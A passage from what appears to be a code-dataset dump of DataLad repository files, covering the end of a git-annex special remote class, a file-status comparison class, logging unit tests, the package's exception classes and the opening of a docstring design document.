URL for a request\n # TODO: method of HTTPRemoteIO\n # in case of a HTTP remote (unchecked for others), storage_host\n # is not just a host, but a full URL without a path\n return f'{self.storage_host}{dsobj_dir}/{key_path}'\n\n return str(dsobj_dir / key_path) if self._local_io() \\\n else '{}: {}:{}'.format(\n self.storage_host,\n self.remote_git_dir,\n sh_quote(str(key_path)),\n )\n\n @staticmethod\n def get_layout_locations(base_path, dsid):\n return get_layout_locations(1, base_path, dsid)\n\n def _get_obj_location(self, key):\n # Notes: - Changes to this method may require an update of\n # ORARemote._layout_version\n # - archive_path is always the same ATM. However, it might depend\n # on `key` in the future. Therefore build the actual filename\n # for the archive herein as opposed to `get_layout_locations`.\n\n if not self._last_archive_path:\n self._last_archive_path = self.remote_archive_dir / 'archive.7z'\n if self._last_keypath[0] != key:\n if self.remote_object_tree_version == '1':\n key_dir = self.annex.dirhash_lower(key)\n\n # If we didn't recognize the remote layout version, we set to\n # read-only and promised to at least try and read according to our\n # current version. 
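            # A minimal illustration (hedged addition, not from the upstream
            # module): the key path assembled just below mirrors git-annex's
            # own object tree, i.e. two hash-derived directory levels, then a
            # directory named after the key that contains the key file itself.
            # With a hypothetical key and hash directories this yields
            # something like:
            #
            #   <remote_obj_dir>/Xq/2d/MD5E-s1234--0123abcd.dat/MD5E-s1234--0123abcd.dat
            #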
So, treat that case as if remote version was our\n # (client's) version.\n else:\n key_dir = self.annex.dirhash(key)\n # double 'key' is not a mistake, but needed to achieve the exact\n # same layout as the annex/objects tree\n self._last_keypath = (key, Path(key_dir) / key / key)\n\n return self.remote_obj_dir, self._last_archive_path, \\\n self._last_keypath[1]\n\n # TODO: implement method 'error'\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=ORARemote,\n remote_name='ora',\n description=\\\n \"transport file content to and from datasets hosted in RIA stores\",\n )\n" }, { "alpha_fraction": 0.562841534614563, "alphanum_fraction": 0.564943253993988, "avg_line_length": 32.507041931152344, "blob_id": "1ea6caf3667b6d26fcab3daaf741915d28ac8894", "content_id": "dcd042967eb6d6604fda54e51dcfe763f89ad460", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2379, "license_type": "permissive", "max_line_length": 87, "num_lines": 71, "path": "/datalad/support/status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"(comparable) descriptors of the file status\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom ..utils import auto_repr\n\n\n@auto_repr\nclass FileStatus(object):\n \"\"\"Description of the file status to e.g. check if newer version is available\n\n \"\"\"\n\n def __init__(self, size=None, mtime=None, filename=None):\n self.size = size\n self.mtime = mtime\n # TODO: actually not sure if filename should be here!\n self.filename = filename\n\n def __eq__(self, other):\n # If other is still None, we must be different\n if not other:\n return False\n # Disallow comparison of empty ones\n if self.size is None and self.mtime is None: # and self.filename is None:\n return NotImplemented\n if other.size is None and other.mtime is None: # and other.filename is None:\n return NotImplemented\n\n same = \\\n self.size == other.size # and \\\n #self.filename == other.filename\n if not same:\n return False\n\n # now deal with time.\n\n # TODO: provide a config option for mtime comparison precision\n # we might want to claim times equal up to a second precision\n # since e.g. 
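        # A minimal illustration (hedged addition, not from the upstream
        # module) of the comparison rules implemented here: sizes must match,
        # and once either mtime is an int the times are compared at whole
        # seconds, e.g.:
        #
        #   FileStatus(size=10, mtime=1446873817) == FileStatus(size=10, mtime=1446873817.4)
        #   # -> True: sizes match and both mtimes truncate to the same second
        #   FileStatus(size=10, mtime=1.2) == FileStatus(size=10, mtime=1.7)
        #   # -> False: neither mtime is an int and they differ
        #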
some file systems do not even store sub-sec timing\n # TODO: config crawl.mtime_delta\n\n # if any of them int and another float -- we need to trim float to int\n if self.mtime == other.mtime:\n return True\n elif self.mtime is None or other.mtime is None:\n return False\n\n # none is None if here and not equal exactly\n if isinstance(self.mtime, int) or isinstance(other.mtime, int):\n return int(self.mtime) == int(other.mtime)\n return False\n\n def __ne__(self, other):\n out = self == other\n if isinstance(out, bool):\n return not out\n elif out is NotImplemented:\n return out\n else:\n raise RuntimeError(\"Unknown return %r\" % (out,))\n" }, { "alpha_fraction": 0.6158432960510254, "alphanum_fraction": 0.6264297962188721, "avg_line_length": 32.4065055847168, "blob_id": "0f95e07b8a7557c500b80f59ba74e39ed5183780", "content_id": "6f8cfd7a5710430ec102bb932e5fd5b3a9d4a3da", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8220, "license_type": "permissive", "max_line_length": 92, "num_lines": 246, "path": "/datalad/tests/test_log.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test logging facilities \"\"\"\n\nimport inspect\nimport logging\nimport os.path\nfrom logging import makeLogRecord\nfrom os.path import exists\nfrom unittest.mock import patch\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.log import (\n ColorFormatter,\n LoggerHelper,\n TraceBack,\n log_progress,\n with_progress,\n with_result_progress,\n)\nfrom datalad.support import ansi_colors as colors\nfrom datalad.support.constraints import EnsureBool\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_in,\n assert_no_open_files,\n assert_not_in,\n assert_re_in,\n known_failure_githubci_win,\n ok_,\n ok_endswith,\n ok_generator,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import on_windows\n\n\n# pretend we are in interactive mode so we could check if coloring is\n# disabled\n@patch(\"datalad.log.is_interactive\", lambda: True)\n@with_tempfile\ndef test_logging_to_a_file(dst=None):\n ok_(not exists(dst))\n\n lgr = LoggerHelper(\"dataladtest-1\").get_initialized_logger(logtarget=dst)\n ok_(exists(dst)) # nothing was logged -- no file created\n\n msg = \"Oh my god, they killed Kenny\"\n lgr.error(msg)\n with open(dst) as f:\n lines = f.readlines()\n assert_equal(len(lines), 1, \"Read more than a single log line: %s\" % lines)\n line = lines[0]\n ok_(msg in line)\n ok_('\\033[' not in line,\n msg=\"There should be no color formatting in log files. Got: %s\" % line)\n # verify that time stamp and level are present in the log line\n # do not want to rely on not having race conditions around date/time changes\n # so matching just with regexp\n # (...)? is added to swallow possible traceback logs\n regex = r\"\\[ERROR\\]\"\n if EnsureBool()(dl_cfg.get('datalad.log.timestamp', False)):\n regex = r\"\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2},\\d{3} \" + regex\n if EnsureBool()(dl_cfg.get('datalad.log.vmem', False)):\n regex += r' RSS/VMS: \\S+/\\S+( \\S+)?\\s*'\n regex += r\"(\\s+\\S+\\s*)? 
\" + msg\n assert_re_in(regex, line, match=True)\n\n # Python's logger is ok (although not documented as supported) to accept\n # non-string messages, which could be str()'ed. We should not puke\n msg2 = \"Kenny is alive\"\n lgr.error(RuntimeError(msg2))\n with open(dst) as f:\n assert_in(msg2, f.read())\n\n # Close all handlers so windows is happy -- apparently not closed fast enough\n for handler in lgr.handlers:\n handler.close()\n assert_no_open_files(dst)\n\n\n@with_tempfile\ndef test_logtarget_via_env_variable(dst=None):\n with patch.dict('os.environ', {'DATALADTEST_LOG_TARGET': dst}):\n ok_(not exists(dst))\n lgr = LoggerHelper(\"dataladtest-2\").get_initialized_logger()\n ok_(not exists(dst))\n # just to see that mocking patch worked\n ok_('DATALADTEST_LOG_TARGET' not in os.environ)\n\n\n@with_tempfile\n@with_tempfile\ndef test_mutliple_targets(dst1=None, dst2=None):\n ok_(not exists(dst1))\n ok_(not exists(dst2))\n lgr = LoggerHelper(\"dataladtest-3\").get_initialized_logger(\n logtarget=\"%s,%s\" % (dst1, dst2))\n ok_(exists(dst1))\n ok_(exists(dst2))\n\n msg = \"Oh my god, they killed Kenny\"\n lgr.error(msg)\n for dst in (dst1, dst2):\n with open(dst) as f:\n lines = f.readlines()\n assert_equal(len(lines), 1, \"Read more than a single log line: %s\" % lines)\n ok_(msg in lines[0])\n # Close all handlers so windows is happy -- apparently not closed fast enough\n for handler in lgr.handlers:\n handler.close()\n\n\ndef check_filters(name):\n with swallow_logs(new_level=logging.DEBUG, name=name) as cml:\n lgr1 = logging.getLogger(name + '.goodone')\n lgr2 = logging.getLogger(name + '.anotherone')\n lgr3 = logging.getLogger(name + '.bad')\n lgr1.debug('log1')\n lgr2.info('log2')\n lgr3.info('log3')\n assert_in('log1', cml.out)\n assert_in('log2', cml.out)\n assert_not_in('log3', cml.out)\n\n\ndef test_filters():\n def _mock_names(self, v, d=None):\n return 'datalad1.goodone,datalad1.anotherone' if v == 'names' else d\n with patch.object(LoggerHelper, '_get_config', _mock_names):\n LoggerHelper('datalad1').get_initialized_logger()\n check_filters('datalad1')\n\n def _mock_namesre(self, v, d=None):\n return 'datalad.*one' if v == 'namesre' else d\n with patch.object(LoggerHelper, '_get_config', _mock_namesre):\n LoggerHelper('datalad2').get_initialized_logger()\n check_filters('datalad2')\n\n\ndef test_traceback():\n from inspect import (\n currentframe,\n getframeinfo,\n )\n\n # do not move lines below among themselves -- we rely on consistent line numbers ;)\n tb_line = getframeinfo(currentframe()).lineno + 2\n def rec(tb, n):\n return rec(tb, n-1) if n else tb()\n tb1 = rec(TraceBack(), 10)\n ok_endswith(tb1, \">test_log:%d,%s\" % (tb_line + 1, \",\".join([str(tb_line)]*10)))\n\n # we limit to the last 100\n tb1 = rec(TraceBack(collide=True), 110)\n ok_endswith(tb1, \"…>test_log:%s\" % (\",\".join([str(tb_line)]*100)))\n\n\n@known_failure_githubci_win\ndef test_color_formatter():\n\n # want to make sure that coloring doesn't get \"stuck\"\n for use_color in False, True, False:\n # we can't reuse the same object since it gets colored etc inplace\n rec = makeLogRecord(\n dict(msg='very long message',\n levelname='DEBUG',\n name='some name'))\n\n cf = ColorFormatter(use_color=use_color)\n if on_windows:\n raise SkipTest('Unclear under which conditions coloring should work')\n (assert_in if use_color else assert_not_in)(colors.RESET_SEQ, cf.format(rec))\n\n\n# TODO: somehow test is stdout/stderr get their stuff\n\n\n@patch(\"datalad.log.is_interactive\", lambda: False)\ndef 
test_log_progress_noninteractive_filter():\n name = \"dl-test\"\n lgr = LoggerHelper(name).get_initialized_logger()\n pbar_id = \"lp_test\"\n with swallow_logs(new_level=logging.INFO, name=name) as cml:\n log_progress(lgr.info, pbar_id, \"Start\", label=\"testing\", total=3)\n log_progress(lgr.info, pbar_id, \"THERE0\", update=1)\n log_progress(lgr.info, pbar_id, \"NOT\", update=1,\n noninteractive_level=logging.DEBUG)\n log_progress(lgr.info, pbar_id, \"THERE1\", update=1,\n noninteractive_level=logging.INFO)\n log_progress(lgr.info, pbar_id, \"Done\")\n for present in [\"Start\", \"THERE0\", \"THERE1\", \"Done\"]:\n assert_in(present, cml.out)\n assert_not_in(\"NOT\", cml.out)\n\n\ndef test_with_result_progress_generator():\n # Tests ability for the decorator to decorate a regular function\n # or a generator function (then it returns a generator function)\n\n @with_result_progress\n def func(l):\n return l\n\n generated = []\n @with_result_progress\n def gen(l):\n for i in l:\n generated.append(i)\n yield i\n\n recs = [{'status': 'ok', 'unrelated': i} for i in range(2)]\n # still works for a func and returns provided list\n ok_(not inspect.isgeneratorfunction(func))\n assert_equal(func(recs), recs)\n\n # generator should still yield and next iteration should only happen\n # when requested\n ok_(inspect.isgeneratorfunction(gen))\n g = gen(recs)\n\n ok_generator(g)\n assert_equal(generated, []) # nothing yet\n assert_equal(next(g), recs[0])\n assert_equal(generated, recs[:1])\n assert_equal(next(g), recs[1])\n assert_equal(generated, recs)\n\n # just to make sure all good to redo\n assert_equal(list(gen(recs)), recs)\n\n\ndef test_with_progress_generator():\n # Well, we could also pass an iterable directly now and display\n # progress iterative over it\n g = with_progress(range(3))\n ok_generator(g)\n assert_equal(list(g), list(range(3)))\n" }, { "alpha_fraction": 0.6254647970199585, "alphanum_fraction": 0.6262615323066711, "avg_line_length": 29.61138153076172, "blob_id": "4e2e230301499fd674edcf2680866a1a0a48669f", "content_id": "32b4ea19f1522caa1727e67f5b3683d38a5aa6fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18826, "license_type": "permissive", "max_line_length": 96, "num_lines": 615, "path": "/datalad/support/exceptions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\" datalad exceptions\n\"\"\"\n\nimport logging\nimport re\nimport traceback\nfrom os import linesep\nfrom pathlib import Path\nfrom pprint import pformat\n\nfrom datalad.runner.exception import CommandError\n\nlgr = logging.getLogger('datalad.support.exceptions')\n\n\nclass CapturedException(object):\n \"\"\"This class represents information about an occurred exception (including\n its traceback), while not holding any references to the actual exception\n object or its traceback, frame references, etc.\n\n Just keep the textual information for logging or whatever other kind of\n reporting.\n \"\"\"\n\n def __init__(self, exc, limit=None, capture_locals=False,\n level=8, logger=None):\n \"\"\"Capture an exception and its 
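        # A minimal illustration (hedged addition, not from the upstream
        # module): typical use is to swallow an exception while keeping a
        # frame-free, loggable record of it (risky_operation and lgr are
        # hypothetical names):
        #
        #   try:
        #       risky_operation()
        #   except Exception as e:
        #       ce = CapturedException(e)   # also logs a one-line traceback
        #                                   # at the low default level 8
        #       lgr.warning("operation failed: %s", ce)  # -> "ExcName(message)"
        #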
traceback for logging.\n\n Clears the exception's traceback frame references afterwards.\n\n Parameters\n ----------\n exc: Exception\n limit: int\n Note, that this is limiting the capturing of the exception's\n traceback depth. Formatting for output comes with it's own limit.\n capture_locals: bool\n Whether or not to capture the local context of traceback frames.\n \"\"\"\n # Note, that with lookup_lines=False the lookup is deferred,\n # not disabled. Unclear to me ATM, whether that means to keep frame\n # references around, but prob. not. TODO: Test that.\n self.tb = traceback.TracebackException.from_exception(\n exc,\n limit=limit,\n lookup_lines=True,\n capture_locals=capture_locals\n )\n traceback.clear_frames(exc.__traceback__)\n\n # log the captured exception\n logger = logger or lgr\n logger.log(level, \"%r\", self)\n\n def format_oneline_tb(self, limit=None, include_str=True):\n \"\"\"Format an exception traceback as a one-line summary\n\n Returns a string of the form [filename:contextname:linenumber, ...].\n If include_str is True (default), this is prepended with the string\n representation of the exception.\n \"\"\"\n return format_oneline_tb(\n self, self.tb, limit=limit, include_str=include_str)\n\n def format_standard(self):\n \"\"\"Returns python's standard formatted traceback output\n\n Returns\n -------\n str\n \"\"\"\n # TODO: Intended for introducing a decent debug mode later when this\n # can be used from within log formatter / result renderer.\n # For now: a one-liner is free\n return ''.join(self.tb.format())\n\n def format_short(self):\n \"\"\"Returns a short representation of the original exception\n\n Form: ExceptionName(exception message)\n\n Returns\n -------\n str\n \"\"\"\n return self.name + '(' + self.message + ')'\n\n def format_with_cause(self):\n \"\"\"Returns a representation of the original exception including the\n underlying causes\"\"\"\n\n return format_exception_with_cause(self.tb)\n\n @property\n def message(self):\n \"\"\"Returns only the message of the original exception\n\n Returns\n -------\n str\n \"\"\"\n return str(self.tb)\n\n @property\n def name(self):\n \"\"\"Returns the class name of the original exception\n\n Returns\n -------\n str\n \"\"\"\n return self.tb.exc_type.__qualname__\n\n def __str__(self):\n return self.format_short()\n\n def __repr__(self):\n return self.format_oneline_tb(limit=None, include_str=True)\n\n\ndef format_oneline_tb(exc, tb=None, limit=None, include_str=True):\n \"\"\"Format an exception traceback as a one-line summary\n\n Parameters\n ----------\n exc: Exception\n tb: TracebackException, optional\n If not given, it is generated from the given exception.\n limit: int, optional\n Traceback depth limit. 
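    # A minimal illustration (hedged addition, not from the upstream module):
    # with include_str=True the returned one-line summary looks roughly like
    #
    #   "file not found [cli.py:main:42,utils.py:read_config:88]"
    #
    # i.e. the exception message followed by a bracketed list of
    # filename:function:lineno entries (file names here are hypothetical).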
If not given, the config setting\n 'datalad.exc.str.tblimit' will be used, or all entries\n are reported.\n include_str: bool\n If set, is True (default), the return value is prepended with a string\n representation of the exception.\n\n Returns\n -------\n str\n Of format [filename:contextname:linenumber, ...].\n \"\"\"\n\n # Note: No import at module level, since ConfigManager imports\n # dochelpers -> circular import when creating datalad.cfg instance at\n # startup.\n from datalad import cfg\n\n if include_str:\n # try exc message else exception type\n leading = exc.message or exc.name\n out = \"{} \".format(leading)\n else:\n out = \"\"\n\n if tb is None:\n tb = traceback.TracebackException.from_exception(\n exc,\n limit=limit,\n lookup_lines=True,\n capture_locals=False,\n )\n\n entries = []\n entries.extend(tb.stack)\n if tb.__cause__:\n entries.extend(tb.__cause__.stack)\n elif tb.__context__ and not tb.__suppress_context__:\n entries.extend(tb.__context__.stack)\n\n if limit is None:\n limit = int(cfg.obtain('datalad.exc.str.tblimit',\n default=len(entries)))\n if entries:\n tb_str = \"[%s]\" % (','.join(\n \"{}:{}:{}\".format(\n Path(frame_summary.filename).name,\n frame_summary.name,\n frame_summary.lineno)\n for frame_summary in entries[-limit:])\n )\n out += \"{}\".format(tb_str)\n\n return out\n\n\ndef format_exception_with_cause(e):\n \"\"\"Helper to recursively format an exception with all underlying causes\n\n For each exception in the chain either the str() of it is taken, or the\n class name of the exception, with the aim to generate a simple and\n comprehensible description that can be used in user-facing messages.\n It is explicitly not aiming to provide a detailed/comprehensive source\n of information for in-depth debugging.\n\n '-caused by-' is used a separator between exceptions to be human-readable\n while being recognizably different from potential exception payload\n messages.\n \"\"\"\n s = str(e) or \\\n (e.exc_type.__name__ if isinstance(e, traceback.TracebackException)\n else e.__class__.__name__)\n exc_cause = getattr(e, '__cause__', None)\n if exc_cause:\n s += f' -caused by- {format_exception_with_cause(exc_cause)}'\n return s\n\n\nclass MissingExternalDependency(RuntimeError):\n \"\"\"External dependency is missing error\"\"\"\n\n def __init__(self, name, ver=None, msg=\"\"):\n super(MissingExternalDependency, self).__init__()\n self.name = name\n self.ver = ver\n self.msg = msg\n\n def __str__(self):\n to_str = 'No working {} installation'.format(self.name)\n if self.ver:\n to_str += \" of version >= %s\" % self.ver\n to_str += \".\"\n if self.msg:\n to_str += \" %s\" % self.msg\n return to_str\n\n\nclass BrokenExternalDependency(RuntimeError):\n \"\"\"Some particular functionality is broken with this dependency.\"\"\"\n\n\nclass DeprecatedError(RuntimeError):\n \"\"\"To raise whenever a deprecated entirely feature is used\"\"\"\n def __init__(self, new=None, version=None, msg=''):\n \"\"\"\n\n Parameters\n ----------\n new : str, optional\n What new construct to use\n version : str, optional\n Since which version is deprecated\n kwargs\n \"\"\"\n super(DeprecatedError, self).__init__()\n self.version = version\n self.new = new\n self.msg = msg\n\n def __str__(self):\n s = self.msg if self.msg else ''\n if self.version:\n s += (\" is deprecated\" if s else \"Deprecated\") + \" since version %s.\" % self.version\n if self.new:\n s += \" Use %s instead.\" % self.new\n return s\n\n\nclass OutdatedExternalDependency(MissingExternalDependency):\n 
\"\"\"External dependency is present but outdated\"\"\"\n\n def __init__(self, name, ver=None, ver_present=None, msg=\"\"):\n super(OutdatedExternalDependency, self).__init__(name, ver=ver, msg=msg)\n self.ver_present = ver_present\n\n def __str__(self):\n to_str = super(OutdatedExternalDependency, self).__str__()\n # MissingExternalDependency ends with a period unless msg is\n # given, in which case it's up to the msg and no callers in\n # our code base currently give a msg ending with a period.\n to_str += \".\" if self.msg else \"\"\n to_str += \" You have version %s\" % self.ver_present \\\n if self.ver_present else \\\n \" Some unknown version of dependency found.\"\n return to_str\n\n\nclass AnnexBatchCommandError(CommandError):\n \"\"\"Thrown if a batched command to annex fails\n\n \"\"\"\n pass\n\n\nclass CommandNotAvailableError(CommandError):\n \"\"\"Thrown if a command is not available due to certain circumstances.\n \"\"\"\n pass\n\n\nclass FileNotInAnnexError(IOError, CommandError):\n \"\"\"Thrown if a file is not under control of git-annex.\n \"\"\"\n def __init__(self, cmd=\"\", msg=\"\", code=None, filename=\"\"):\n CommandError.__init__(self, cmd=cmd, msg=msg, code=code)\n IOError.__init__(self, code, \"%s: %s\" % (cmd, msg), filename)\n\n def to_str(self, include_output=True):\n return \"%s\\n%s\" % (\n CommandError.to_str(self, include_output=include_output),\n IOError.__str__(self))\n\n\nclass FileInGitError(FileNotInAnnexError):\n \"\"\"Thrown if a file is not under control of git-annex, but git itself.\n \"\"\"\n pass\n\n\nclass FileNotInRepositoryError(FileNotInAnnexError):\n \"\"\"Thrown if a file is not under control of the repository at all.\n \"\"\"\n pass\n\n\nclass InvalidGitReferenceError(ValueError):\n \"\"\"Thrown if provided git reference is invalid\n \"\"\"\n def __init__(self, ref, *args, **kwargs):\n super(InvalidGitReferenceError, self).__init__(*args, **kwargs)\n self.ref = ref\n\n def __str__(self):\n return u\"Git reference '{}' invalid\".format(self.ref)\n\n\nclass GitIgnoreError(CommandError):\n \"\"\"Thrown if a path was ignored by a git command due to .gitignore file\n\n Note, that this might be thrown to indicate what was ignored, while the\n actual operation was partially successful (regarding paths, not in .gitignore)\n\n Note/Todo:\n in case of a directory being ignored, git returns that directory as the\n ignored path, even if a path within that directory was passed to the command.\n That means, that in such cases the returned path might not match an item you\n passed!\n \"\"\"\n\n pattern = \\\n re.compile(r'ignored by one of your .gitignore files:\\s*(.*)'\n r'^(?:hint: )?Use -f.*$',\n flags=re.MULTILINE | re.DOTALL)\n\n def __init__(self, cmd=\"\", msg=\"\", code=None, stdout=\"\", stderr=\"\",\n paths=None):\n super(GitIgnoreError, self).__init__(\n cmd=cmd, msg=msg, code=code, stdout=stdout, stderr=stderr)\n self.paths = paths\n\n def to_str(self, include_output=True):\n # Override CommandError.to_str(), ignoring include_output.\n return self.msg\n\n\nclass PathOutsideRepositoryError(Exception):\n \"\"\"Thrown if a path points outside the repository that was requested to\n deal with that path.\"\"\"\n\n # TODO: use it in GitRepo/AnnexRepo!\n def __init__(self, file_, repo):\n self.file_ = file_\n self.repo = repo\n\n def __str__(self):\n return \"path {0} not within repository {1}\".format(self.file_, self.repo)\n\n\nclass PathKnownToRepositoryError(Exception):\n \"\"\"Thrown if file/path is under Git control, and attempted operation\n 
must not be ran\"\"\"\n pass\n\n\nclass GitError(Exception):\n \"\"\" Base class for all package exceptions \"\"\"\n\n\nclass NoSuchPathError(GitError, OSError):\n \"\"\" Thrown if a path could not be access by the system. \"\"\"\n\n\nclass MissingBranchError(Exception):\n \"\"\"Thrown if accessing a repository's branch, that is not available\"\"\"\n\n def __init__(self, repo, branch, available_branches=None, msg=None):\n self.repo = repo\n self.branch = branch\n self.branches = available_branches\n if msg is None:\n self.msg = \"branch '{0}' missing in {1}.\" \\\n \"\".format(self.branch, self.repo)\n if self.branches:\n self.msg += \" Available branches: {0}\".format(self.branches)\n else:\n self.msg = msg\n\n def __str__(self):\n return self.msg\n\n\nclass InsufficientArgumentsError(ValueError):\n \"\"\"To be raise instead of `ValueError` when use help output is desired\"\"\"\n pass\n\n\nclass NoDatasetArgumentFound(InsufficientArgumentsError):\n \"\"\"To be raised when expecting having a dataset but none was provided\"\"\"\n pass\n\n\nclass NoDatasetFound(NoDatasetArgumentFound):\n \"\"\"Raised whenever a dataset is required, but none could be determined\"\"\"\n pass\n\n\nclass OutOfSpaceError(CommandError):\n \"\"\"To be raised whenever a command fails if we have no sufficient space\n\n Example is annex get command\n \"\"\"\n\n def __init__(self, sizemore_msg=None, **kwargs):\n super(OutOfSpaceError, self).__init__(**kwargs)\n self.sizemore_msg = sizemore_msg\n\n def to_str(self, include_output=True):\n super_str = super().to_str(\n include_output=include_output).rstrip(linesep + '.')\n return \"%s needs %s more\" % (super_str, self.sizemore_msg)\n\n\nclass RemoteNotAvailableError(CommandError):\n \"\"\"To be raised whenever a required remote is not available\n\n Example is \"annex get somefile --from=MyRemote\",\n where 'MyRemote' doesn't exist.\n \"\"\"\n\n def __init__(self, remote, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n remote: str\n name of the remote\n kwargs:\n arguments from CommandError\n \"\"\"\n super(RemoteNotAvailableError, self).__init__(**kwargs)\n self.remote = remote\n\n def to_str(self, include_output=True):\n super_str = super().to_str(include_output=include_output)\n return \"Remote '{0}' is not available. Command failed:{1}{2}\" \\\n \"\".format(self.remote, linesep, super_str)\n\n\nclass InvalidInstanceRequestError(RuntimeError):\n \"\"\"Thrown if a request to create a (flyweight) instance is invalid\"\"\"\n\n def __init__(self, id_, msg=None):\n super(InvalidInstanceRequestError, self).__init__(msg)\n self.id = id_\n self.msg = msg\n\n\nclass InvalidGitRepositoryError(GitError):\n \"\"\" Thrown if the given repository appears to have an invalid format. \"\"\"\n\n\nclass InvalidAnnexRepositoryError(RuntimeError):\n \"\"\"Thrown if AnnexRepo was instantiated on a non-annex and\n without init=True\"\"\"\n\n\nclass DirectModeNoLongerSupportedError(NotImplementedError):\n \"\"\"direct mode is no longer supported\"\"\"\n\n def __init__(self, repo, msg=None):\n super(DirectModeNoLongerSupportedError, self).__init__(\n ((\" \" + msg + \", but \") if msg else '')\n +\n \"direct mode of operation is being deprecated in git-annex and \"\n \"no longer supported by DataLad. 
\"\n \"Please use 'git annex upgrade' under %s to upgrade your direct \"\n \"mode repository to annex v6 (or later).\" % repo.path\n )\n self.repo = repo # might come handy\n\n\nclass IncompleteResultsError(RuntimeError):\n \"\"\"Exception to be raised whenever results are incomplete.\n\n Any results produced nevertheless are to be passed as `results`,\n and become available via the `results` attribute.\n \"\"\"\n # TODO passing completed results doesn't fit in a generator paradigm\n # such results have been yielded already at the time this exception is\n # raised, little point in collecting them just for the sake of a possible\n # exception\n # MIH+YOH: AnnexRepo.copy_to and @eval_results are the last\n # remaining user of this functionality.\n # General use (as in AnnexRepo) of it discouraged but use in @eval_results\n # is warranted\n def __init__(self, results=None, failed=None, msg=None):\n super(IncompleteResultsError, self).__init__(msg)\n self.results = results\n self.failed = failed\n\n def __str__(self):\n super_str = super(IncompleteResultsError, self).__str__()\n return \"{}{}{}\".format(\n super_str,\n \". {} result(s)\".format(len(self.results)) if self.results else \"\",\n \". {} failed:{}{}\".format(\n len(self.failed),\n linesep,\n pformat(self.failed)) if self.failed else \"\")\n\n\nclass InstallFailedError(CommandError):\n \"\"\"Generic exception to raise whenever `install` command fails\"\"\"\n pass\n\n\nclass ConnectionOpenFailedError(CommandError):\n \"\"\"Exception to raise whenever opening a network connection fails\"\"\"\n pass\n#\n# Downloaders\n#\n\n\nclass DownloadError(Exception):\n\n def __init__(self, msg=None, status=None, **kwargs):\n super(DownloadError, self).__init__(msg, **kwargs)\n # store response status code\n self.status = status\n\n\nclass IncompleteDownloadError(DownloadError):\n pass\n\n\nclass UnaccountedDownloadError(IncompleteDownloadError):\n pass\n\n\nclass TargetFileAbsent(DownloadError):\n pass\n\n\nclass AccessDeniedError(DownloadError):\n def __init__(self, msg=None, supported_types=None, **kwargs):\n super(AccessDeniedError, self).__init__(msg, **kwargs)\n self.supported_types = supported_types\n\n\nclass AnonymousAccessDeniedError(AccessDeniedError):\n pass\n\n\nclass AccessPermissionExpiredError(AccessDeniedError):\n \"\"\"To raise when there is a belief that it is due to expiration of a credential\n\n which we might possibly be able to refresh, like in the case of CompositeCredential\n \"\"\"\n pass\n\n\nclass AccessFailedError(DownloadError):\n pass\n\n\nclass UnhandledRedirectError(DownloadError):\n def __init__(self, msg=None, url=None, **kwargs):\n super(UnhandledRedirectError, self).__init__(msg, **kwargs)\n self.url = url\n\n#\n# Crawler\n#\n\n\nclass CrawlerError(Exception):\n pass\n\n\nclass PipelineNotSpecifiedError(CrawlerError):\n pass\n\n\n#\n# Warnings\n#\n\nclass DataLadWarning(Warning):\n pass\n\n\n# We have an exception OutdatedExternalDependency, but it is intended for\n# an instance being raised. 
`warnings` module requires a class to be provided\n# as a category, so here is a dedicated Warning class\nclass OutdatedExternalDependencyWarning(DataLadWarning):\n \"\"\"Warning \"category\" to use to report about outdated\"\"\"\n pass\n" }, { "alpha_fraction": 0.7234323620796204, "alphanum_fraction": 0.7260726094245911, "avg_line_length": 34.23255920410156, "blob_id": "52d79deaa4d16b5d2d7da6c35319176006149f74", "content_id": "0dc6fc79b29011a712f6ff5cbb81181aafec3a28", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3030, "license_type": "permissive", "max_line_length": 274, "num_lines": 86, "path": "/docs/source/design/docstrings.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_docstrings:\n\n**********\nDocstrings\n**********\n\n.. topic:: Specification scope and status\n\n This specification provides a partial overview of the current\n implementation.\n\nDocstrings in DataLad source code are used and consumed in many ways. Besides\nserving as documentation directly in the sources, they are also transformed\nand rendered in various ways.\n\n- Command line ``--help`` output\n- Python's ``help()`` or IPython's ``?``\n- Manpages\n- Sphinx-rendered documentation for the Python API and 